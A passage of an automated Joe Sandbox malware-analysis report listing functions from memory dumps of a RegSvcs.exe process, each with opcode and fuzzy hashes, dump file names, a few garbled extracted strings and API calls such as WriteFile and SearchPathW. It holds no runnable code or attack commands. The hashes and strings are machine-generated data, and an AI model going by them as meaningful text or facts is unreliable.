Instruction Fuzzy Hash: 23E0261160A3805ECB276330083107D37350F6371135604AFD802AB653ED588C0583AB

Uniqueness

Uniqueness Score: -1.00%

Function 004544E0, Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb069b2fa606ed2f27116515ab44b0079798b9a3efddabcf0262482d030bcd9a
Instruction ID: 9bd4a9c4c8d42355bc93d3dcd925cf0d9e3b99ab1aee2ed2aabeb7d79e0536fa
Opcode Fuzzy Hash: fb069b2fa606ed2f27116515ab44b0079798b9a3efddabcf0262482d030bcd9a
Instruction Fuzzy Hash: 38E0DF31804B09D7CF00EF68CC184DAF3B1FF85304B214A1AE94A33251EF38B995CA91

Uniqueness

Uniqueness Score: -1.00%

Function 00456828, Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84f39bf94abdbd2e92ae492a4390ccb48e27a7a291d3aa953a938ef6d711210b
Instruction ID: 4046e7e510276a8b803330b9748c66ec0e59377aae9892b3dcc06b2c22d15b20
Opcode Fuzzy Hash: 84f39bf94abdbd2e92ae492a4390ccb48e27a7a291d3aa953a938ef6d711210b
Instruction Fuzzy Hash: 8BD02B3164541083E70033AC541126A3749DB42353B950027DD07C3342CE5D8C8593AB

Uniqueness

Uniqueness Score: -1.00%

Function 00452D98, Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58f248debde25de5c956f5e792fbaaeff7e8818214b2938b3adcfbafba2b1c7f
Instruction ID: d621d30116355a40fce9d22b5645c1b36e991b23a685fdee5f30bc11c0a29530
Opcode Fuzzy Hash: 58f248debde25de5c956f5e792fbaaeff7e8818214b2938b3adcfbafba2b1c7f
Instruction Fuzzy Hash: C6D05E7808C384AFD35742781925BA03B749F03702F1505A7EC8ACA4E38289240F9B2B

Uniqueness

Uniqueness Score: -1.00%

Function 004562C0, Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d77bc9bf3e685f7f716fa13d02c4269784f946b1fe52ed240a760a824da5b9c1
Instruction ID: ba3b8c0f8ddfadd33a104cef7d2427fd3002d4e851caced61f7bbcd1a87fbb5f
Opcode Fuzzy Hash: d77bc9bf3e685f7f716fa13d02c4269784f946b1fe52ed240a760a824da5b9c1
Instruction Fuzzy Hash: 8CD0A722300129176A097B7E980163F264EABD2E51341446EF806EB381DE358C0043E9

Uniqueness

Uniqueness Score: -1.00%

Function 00459700, Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e922522dc3032a6d998157153d410b0764d7c32f523f1f7d250354a88998fe85
Instruction ID: 6d34f26ae50a08de3dda9b3800af400ad7a79203bd51f530dca8f2b62ff169d5
Opcode Fuzzy Hash: e922522dc3032a6d998157153d410b0764d7c32f523f1f7d250354a88998fe85
Instruction Fuzzy Hash: 2CD05E2006D280EEEB250B601C26BB97F64CB0E302F2501CBE80A96893914D5C0EB22B

Uniqueness

Uniqueness Score: -1.00%

Function 0045F920, Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 756fb545768ba59a63f6ec0b9b80c80c7979c1cc24fd510150f5d1a7667ad702
Instruction ID: f353fb117bc987433cff09695f278cebc0dc3be11d5ea39a2f7e1545fba37483
Opcode Fuzzy Hash: 756fb545768ba59a63f6ec0b9b80c80c7979c1cc24fd510150f5d1a7667ad702
Instruction Fuzzy Hash: B1D0A731300114179708E5ACD91187A778EDBC5614314C87DF40ED7391CE739C0247D0

Uniqueness

Uniqueness Score: -1.00%

Function 0045E5E0, Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c678aa341bb8fff34b2e42a7469e7e0a350914918bc2e530c14fb9df4033a864
Instruction ID: d0b9d34f47e32ccc34ae9e6751825d7a33c24190c8adb8d6c185abdfc485aaad
Opcode Fuzzy Hash: c678aa341bb8fff34b2e42a7469e7e0a350914918bc2e530c14fb9df4033a864
Instruction Fuzzy Hash: D6D02B30008234EBC62C029380044B27398A7283577B0009BFC0B82102F569994BA39B

Uniqueness

Uniqueness Score: -1.00%

Function 004579E8, Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f86c2e8c51db8225a3dcbd6829b09d204fcd42fd7573a51c0d8977496e85793
Instruction ID: 1cef5f5434f478b9eb9b1fe83320fbedd2e9a51aaa5cf88bc8943f16d9c67c5d
Opcode Fuzzy Hash: 9f86c2e8c51db8225a3dcbd6829b09d204fcd42fd7573a51c0d8977496e85793
Instruction Fuzzy Hash: 00D0C27100C390CBD3374AA5B4046A676D96B01356F14097FC84205502C969AE8D93A7

Uniqueness

Uniqueness Score: -1.00%

Function 004559A6, Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7eb1fce8498306f66bdc62bc3208da1d0345803e49837369485fc7ef3624dca
Instruction ID: 7b86bca688c7b62ac8a5e160ed387fce3274c829072e5361d328bda110b5ce91
Opcode Fuzzy Hash: c7eb1fce8498306f66bdc62bc3208da1d0345803e49837369485fc7ef3624dca
Instruction Fuzzy Hash: 3CD0C271B0A404CFDF00A7E498651FCB3A1AF84236B240877C40AA7142DA38086647A6

Uniqueness

Uniqueness Score: -1.00%

Function 004502A0, Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbc85f6ae7b2b8ed54bc79994a0b122d7ecdf10b245dcc0db68a79b772995dd6
Instruction ID: d03b50e3b49ed66e60e1fd3aaef57ff4b9a3870e7d918840e592c3193edc5884
Opcode Fuzzy Hash: cbc85f6ae7b2b8ed54bc79994a0b122d7ecdf10b245dcc0db68a79b772995dd6
Instruction Fuzzy Hash: B0D02B3950E700CFC71567B0E41948037F0BB453007064CCFE4929B517CB20BC458366

Uniqueness

Uniqueness Score: -1.00%

Function 00456360, Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab11b7083e7b448a39625227b8b63cbd557d6f159d9ef03ffb8ae2df681ddac7
Instruction ID: d1c66d2ffc98ea3c99e5e44071d759b8e0d8fc5c2e2b9e2c220720bc1b559bcb
Opcode Fuzzy Hash: ab11b7083e7b448a39625227b8b63cbd557d6f159d9ef03ffb8ae2df681ddac7
Instruction Fuzzy Hash: 80D0C73134011417A748E5AD995187A778EDBD5754355C46DF50ED7391CE639C0247D0

Uniqueness

Uniqueness Score: -1.00%

Function 00455618, Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a13a28e5a42ad46f76b8a7ad62e0eecd8bf4bfcebf753a52eb8c2ee4354e09c
Instruction ID: 0dc3f1f6eba3ddeba64cd1583ae5c5684503cbe7d9767fa80ef20e15f5f9d769
Opcode Fuzzy Hash: 9a13a28e5a42ad46f76b8a7ad62e0eecd8bf4bfcebf753a52eb8c2ee4354e09c
Instruction Fuzzy Hash: DAD05E3500E6C08ECB05073029BE4A42F24CA1370A346048BC80A87863D5195A4F9A0B

Uniqueness

Uniqueness Score: -1.00%

Function 001823F4, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.671199419.0000000000182000.00000040.00000001.sdmp, Offset: 00182000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_182000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39dfa7128b2acb75d8030558158b174f3740998424cfbf88eeb6e47e18d2be8e
Instruction ID: 8a6f29a82492d42dc9ea3b5870c8158d3c9f933818d5690cd6406441350e171e
Opcode Fuzzy Hash: 39dfa7128b2acb75d8030558158b174f3740998424cfbf88eeb6e47e18d2be8e
Instruction Fuzzy Hash: B9D05E79304A818FD3179B1CC1A4B9537D4AB51B04F5644FAE800CB6A3C378DA81D610

Uniqueness

Uniqueness Score: -1.00%

Function 0045F110, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41c05738804f2508a227c0ec7a51cb332adb651d7b3ff80252458d8e7672e0d6
Instruction ID: 09ff4336b76b7a8f9600e65b1d395a44adc936aa04aedef6e1abad26ecb587d5
Opcode Fuzzy Hash: 41c05738804f2508a227c0ec7a51cb332adb651d7b3ff80252458d8e7672e0d6
Instruction Fuzzy Hash: FAC08031904614D34B25B1F679014DDB79C8D05357F5004BBFD0957602F6669D1DD3DB

Uniqueness

Uniqueness Score: -1.00%

Function 0045F9D7, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf87ac448899ba44bb57982b29bbbd062ad71aab50ccb3e7af40323c94fa61af
Instruction ID: 1dc2960d0f9ef0413e68b425d6f440ab8634c1bd0bfdeea797d77d97be5ed62d
Opcode Fuzzy Hash: cf87ac448899ba44bb57982b29bbbd062ad71aab50ccb3e7af40323c94fa61af
Instruction Fuzzy Hash: 0ED0A7D9508D80BECB475220911172527209A9236137404E3C945CE113D01C1C4E8367

Uniqueness

Uniqueness Score: -1.00%

Function 0045EE18, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: afd07b4e7304124390241ea435a7f057f8ee35527917de790cd46e0748efe09f
Instruction ID: 04778d8d5679f27cd4557e1f212ec00daed3da1b60a6bba306ec16f22441e418
Opcode Fuzzy Hash: afd07b4e7304124390241ea435a7f057f8ee35527917de790cd46e0748efe09f
Instruction Fuzzy Hash: 1BD0A731028204C7832C4F06D4014A173699604313360481BC84F03602C7A5BD4BD786

Uniqueness

Uniqueness Score: -1.00%

Function 001823BC, Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.671199419.0000000000182000.00000040.00000001.sdmp, Offset: 00182000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_182000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6f2e23f7e3e1b56a20dde9cc6c179277f01071de3ea40b7e0bf0eb3447357ae
Instruction ID: 51d142fa4ab88dea29685de06467a691db145b7209b9a281c1f7cde574ab28f9
Opcode Fuzzy Hash: f6f2e23f7e3e1b56a20dde9cc6c179277f01071de3ea40b7e0bf0eb3447357ae
Instruction Fuzzy Hash: BDD09E783406818BD71ADB1CD6A4F5977E4BB44704F1644E9BC108B666C7B8DE81DA40

Uniqueness

Uniqueness Score: -1.00%

Function 004581A2, Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8cf12fea778d02ae00e698d94e09bb2ea62a86eed9c5633aaf34dfb71d9c63c
Instruction ID: e7d4bcb5c4e8e1f38e39297f963c32bc88c0583855c81fccfe44c00e63c461b7
Opcode Fuzzy Hash: c8cf12fea778d02ae00e698d94e09bb2ea62a86eed9c5633aaf34dfb71d9c63c
Instruction Fuzzy Hash: B3D05E34900608DFC742CF71D9180DD37F0AB09721320076AD802A73C2EB340C068B10

Uniqueness

Uniqueness Score: -1.00%

Function 00455628, Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e04ef04a86f92d2a69ef3e7ca7dabd903b8cce5a6b62a5475c9df9c58b1cc77
Instruction ID: 05e9f35790fcf9355dbd92bdd0e1d75d2d0be401762691c825896278825ae786
Opcode Fuzzy Hash: 1e04ef04a86f92d2a69ef3e7ca7dabd903b8cce5a6b62a5475c9df9c58b1cc77
Instruction Fuzzy Hash: 1FD0C930008984CBD61027A46D6D7397B58AF01306B850053D80E829A3DB289989DA5B

Uniqueness

Uniqueness Score: -1.00%

Function 00450180, Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19b00f2a43c8311de93ea444e9996b9a2a3d34b64389e83d449d2911a9ee65f9
Instruction ID: c610294fdaf6040e9ba4890823a1f0ab83aa11cc45c397379412127844e62b3a
Opcode Fuzzy Hash: 19b00f2a43c8311de93ea444e9996b9a2a3d34b64389e83d449d2911a9ee65f9
Instruction Fuzzy Hash: EDD01234210304CFCB182BB4E42D42C33BAAB8860A34009BEE80A87B60DE37A880CA50

Uniqueness

Uniqueness Score: -1.00%

Function 004598A0, Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 383bc7696579dd670aa36ccfe15219a21b267a28d6ba97f751e200b8dd379558
Instruction ID: 7215420d0b9caba78044bcde906cf2d440893c3ee5e4b058eb7007c042593c02
Opcode Fuzzy Hash: 383bc7696579dd670aa36ccfe15219a21b267a28d6ba97f751e200b8dd379558
Instruction Fuzzy Hash: 56B092312A42094AEB50A7B5780576A328CAB50619F444062B80DC6A01E68AE8542188

Uniqueness

Uniqueness Score: -1.00%

Function 00455F20, Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b24ada2e9b459594cd2c1c3505fb4178ed4b6d5daed6313a9b51279a85d43a4
Instruction ID: a3df0c74a8a8df41540090cdd12c3f3643bdc2ecbd75d836c5a4902ec05ca816
Opcode Fuzzy Hash: 2b24ada2e9b459594cd2c1c3505fb4178ed4b6d5daed6313a9b51279a85d43a4
Instruction Fuzzy Hash: 6BC02B31224A04CBAE002BB13C1E53F378C9F442063400057EC0FC1611EF78D4805146

Uniqueness

Uniqueness Score: -1.00%

Function 00452F38, Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35cadb988eb9ab3903d6de8c8b326b5cb6a6bdcddc36b16a91132d5daf295501
Instruction ID: 6c8378fb9498697645e4a28c72560cfcd4700e551a04b052ef9d5ea0c4c0bb48
Opcode Fuzzy Hash: 35cadb988eb9ab3903d6de8c8b326b5cb6a6bdcddc36b16a91132d5daf295501
Instruction Fuzzy Hash: 27B0923235460A0BFA5097BA788876A339CA740629F8800B7B80DC1A11E58AE8A02084

Uniqueness

Uniqueness Score: -1.00%

Function 0045CD89, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da51cb0adb761bd032c9902af92a1f7010dc41d6eb0b812ca13cd20003a71212
Instruction ID: 50de5341300b831721e5b10816231853b8ab731f7444405df0546aec2fedf18f
Opcode Fuzzy Hash: da51cb0adb761bd032c9902af92a1f7010dc41d6eb0b812ca13cd20003a71212
Instruction Fuzzy Hash: 95C0123020A3D18FCF134730A8680403F30DD4330A30C48DBC0C0CE2A3E22A841ACB01

Uniqueness

Uniqueness Score: -1.00%

Function 00450660, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6a76833410a102711d7e703d52524a2517e350445ce2e999467b8cd593e7f73
Instruction ID: 9f2144b4aef51655cc745e0bcd1118f03de947ebd07bbff462028defc7a2aa47
Opcode Fuzzy Hash: b6a76833410a102711d7e703d52524a2517e350445ce2e999467b8cd593e7f73
Instruction Fuzzy Hash: A2C09B75459214CFC34457B55C06539721D9BD1306764C0379901005628977A877E55B

Uniqueness

Uniqueness Score: -1.00%

Function 0045F968, Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 619c46847690d417d060d033bd61fbe01bcdf69b5afe81caebb8f6d2be5819a2
Instruction ID: d42c0126bf5f8c92c405fbf00029c71c71eeb85b55b257fd101b1c3b76b831e0
Opcode Fuzzy Hash: 619c46847690d417d060d033bd61fbe01bcdf69b5afe81caebb8f6d2be5819a2
Instruction Fuzzy Hash: 46B01230105B08878D043BF3242911C735D0A441063404417BC1D42702DD3C6450805A

Uniqueness

Uniqueness Score: -1.00%

Function 0045D7A0, Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3df0b00abb70328b1af656fae301d079d6687e06912efdb809d22669a9a5299
Instruction ID: 763fa1ce5c84b76c8a1cb0d42e1747b0f8fecb9fa4d4f2752035a3b8ae94990f
Opcode Fuzzy Hash: b3df0b00abb70328b1af656fae301d079d6687e06912efdb809d22669a9a5299
Instruction Fuzzy Hash: B5B09234849708EBF258BB51D809959B628BF063533D0401AF812210AA6BA86A4AE69B

Uniqueness

Uniqueness Score: -1.00%

Function 00454502, Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 231c02493bfa60d0b7b1ec6045edfb7beaac9c2d17a35ececac70c9c855634c2
Instruction ID: 54fc9579f9bfda9ddcbdadf3a0d35545a08918a9a2dc8019f4c944a4193e7ff9
Opcode Fuzzy Hash: 231c02493bfa60d0b7b1ec6045edfb7beaac9c2d17a35ececac70c9c855634c2
Instruction Fuzzy Hash: 50B0121C90C040EB42000B3028140282A40B785307320D043DC034AA16E6AC42CB7216

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0076410E, Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.671662373.0000000000760000.00000004.00020000.sdmp, Offset: 00760000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_760000_RegSvcs.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2538c29bd625c38f057775a0a92e2af5041197f58357eb6944769712b7355a5f
Instruction ID: cd634555b8c7cd0e76ce38eba16aaff1c1761c42b5408842323e69fd38fa4f20
Opcode Fuzzy Hash: 2538c29bd625c38f057775a0a92e2af5041197f58357eb6944769712b7355a5f
Instruction Fuzzy Hash: F931681500F7C26FC7134B349DB5AE2BF759E63204B1E86C7E4C18E4A3E219595AC3B2

Uniqueness

Uniqueness Score: -1.00%

Function 00450DD4, Relevance: 9.0, Strings: 7, Instructions: 251COMMON

Download Yara Rule

Strings

<WTq, xrefs: 00450E2D
h8Vq, xrefs: 00450E80
_4q, xrefs: 00450EF2
HVq, xrefs: 00451028
PUq, xrefs: 004510B5
:@/q, xrefs: 00451113
lUq, xrefs: 00450FD6

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID: _4q$:@/q$<WTq$HVq$PUq$h8Vq$lUq
API String ID: 0-3834201401
Opcode ID: d8aa841fcf7ad19cc9c1590918995f824bffdc99033ab12a964fd34c8f96f06b
Instruction ID: 76582e74463606d83789f40628aa42881321d98e1fb9cf1c79407a784d5f4ff5
Opcode Fuzzy Hash: d8aa841fcf7ad19cc9c1590918995f824bffdc99033ab12a964fd34c8f96f06b
Instruction Fuzzy Hash: 6FB12C74746345CFE3A8EF34C25576AB7E2BBC8708F10496DE5898B395EB719841CB02

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: RegSvcs.exe PID: 2960 Parent PID: 2212 RegSvcs.exeCOMMON

Execution Graph

Execution Coverage:	22.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	68
Total number of Limit Nodes:	3

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 003C03E2, Relevance: 2.6, Strings: 2, Instructions: 122
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

H-Tq, xrefs: 003C044C
H-Tq, xrefs: 003C042F

Memory Dump Source

Source File: 0000000E.00000002.433774690.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_3c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: H-Tq$H-Tq
API String ID: 0-1433740457
Opcode ID: b5ebad15321ee64dd216fec7ab2f32186811142da58a9925856d4d6278b43d2b
Instruction ID: 81a70bcdbf7a4faf3a063eef4addb290d3612816cb9fe34168145bda4bff6fbe
Opcode Fuzzy Hash: b5ebad15321ee64dd216fec7ab2f32186811142da58a9925856d4d6278b43d2b
Instruction Fuzzy Hash: 48415D70A01355CBEB1EAFB4C559BAE7AB1AF88708F15446CD402EB690CF758C96CF90

Uniqueness

Uniqueness Score: -1.00%

Function 001BA587, Relevance: 1.6, APIs: 1, Instructions: 83
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SearchPathW.KERNELBASE(?,00000E40,?,?), ref: 001BA63A

Memory Dump Source

Source File: 0000000E.00000002.433595504.00000000001BA000.00000040.00000001.sdmp, Offset: 001BA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1ba000_RegSvcs.jbxd

Similarity

API ID: PathSearch
String ID:
API String ID: 2203818243-0
Opcode ID: b4d22301269d2ab226bb99edcbbb7ba9631a1901e85d0895a7663e46a9c89428
Instruction ID: b9a14869ba7d64edd026ff5fa64b155a5de37959ea2f1640e1de36f84d921d60
Opcode Fuzzy Hash: b4d22301269d2ab226bb99edcbbb7ba9631a1901e85d0895a7663e46a9c89428
Instruction Fuzzy Hash: 2D318E7250E3C55FE313CB259C61B66BFB4EF43614F1A81DBD8848F193E225A909C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 001BA4AA, Relevance: 1.6, APIs: 1, Instructions: 79
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteFile.KERNELBASE(?,00000E40,9228A765,00000000,00000000,00000000,00000000), ref: 001BA53D

Memory Dump Source

Source File: 0000000E.00000002.433595504.00000000001BA000.00000040.00000001.sdmp, Offset: 001BA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1ba000_RegSvcs.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: d8a74e30442c4a8257097088c69a5d57eaf107f3e63791c17aa5f5859de1d547
Instruction ID: 81008c785078bc56a348c215831a8f3e551414de4c65df81aeee4412703b9676
Opcode Fuzzy Hash: d8a74e30442c4a8257097088c69a5d57eaf107f3e63791c17aa5f5859de1d547
Instruction Fuzzy Hash: 2121B571409380AFE7228B65DC54F96BFB8EF06310F0885DBE9849F193D225A909DB72

Uniqueness

Uniqueness Score: -1.00%

Function 001BA1F4, Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetConsoleOutputCP.KERNEL32 ref: 001BA269

Memory Dump Source

Source File: 0000000E.00000002.433595504.00000000001BA000.00000040.00000001.sdmp, Offset: 001BA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1ba000_RegSvcs.jbxd

Similarity

API ID: ConsoleOutput
String ID:
API String ID: 3985236979-0
Opcode ID: df483ba68f6f0fab72567d1b4768f161890f8638d20b5de368b0b160c718dadd
Instruction ID: 31f1f3dfdce573addf2762e2366a0deb5113cca0cf7c8ae4f9162a4bbb2c4ca3
Opcode Fuzzy Hash: df483ba68f6f0fab72567d1b4768f161890f8638d20b5de368b0b160c718dadd
Instruction Fuzzy Hash: D421903140E7C09FD7138B259C95692BFB0EF03220F0A81DBD9848F1A3D3699909DB72

Uniqueness

Uniqueness Score: -1.00%

Function 001BA5C6, Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SearchPathW.KERNELBASE(?,00000E40,?,?), ref: 001BA63A

Memory Dump Source

Source File: 0000000E.00000002.433595504.00000000001BA000.00000040.00000001.sdmp, Offset: 001BA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1ba000_RegSvcs.jbxd

Similarity

API ID: PathSearch
String ID:
API String ID: 2203818243-0
